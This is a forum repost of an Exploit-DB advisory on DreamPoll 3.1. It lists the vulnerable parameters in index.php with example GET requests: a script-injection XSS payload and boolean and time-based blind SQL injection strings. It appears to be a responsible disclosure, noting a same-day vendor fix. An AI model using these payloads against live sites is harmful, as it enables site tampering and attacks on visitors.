Exploit DreamPoll 3.1 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10006
Проверка EDB
  1. Пройдено
Автор
MARK FROM INFOSECSTUFF
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4746 cve-2009-4745
Дата публикации
2009-10-08
Код:
During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number of XSS and SQL Injection vulnerabilities in the application. These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application. Details of the vulnerabilities are as follows:

XSS

????????-

File: index.php

Variable: recordsPerPage

Example: GET /index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=
1>?><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>

Blind SQL/Xpath Injection

????????-

File: index.php

Variable: sortField

Example: GET /index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc
=1&recordsPerPage=20

Blind SQL Injection (Timing)

????????-

File: index.php

Variables: sortField, sortDesc, pageNumber

Example: GET /index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1
&recordsPerPage=20

While not specifically tested, it is likely these vulnerabilities exist in earlier versions of this application as well. The vendor was notified on 09/28/2009 and a fix was released the same day. If you are a current user of this software, contact the vendor for the available fix.

http://www.infosecstuff.com
 
Источник
www.exploit-db.com

Похожие темы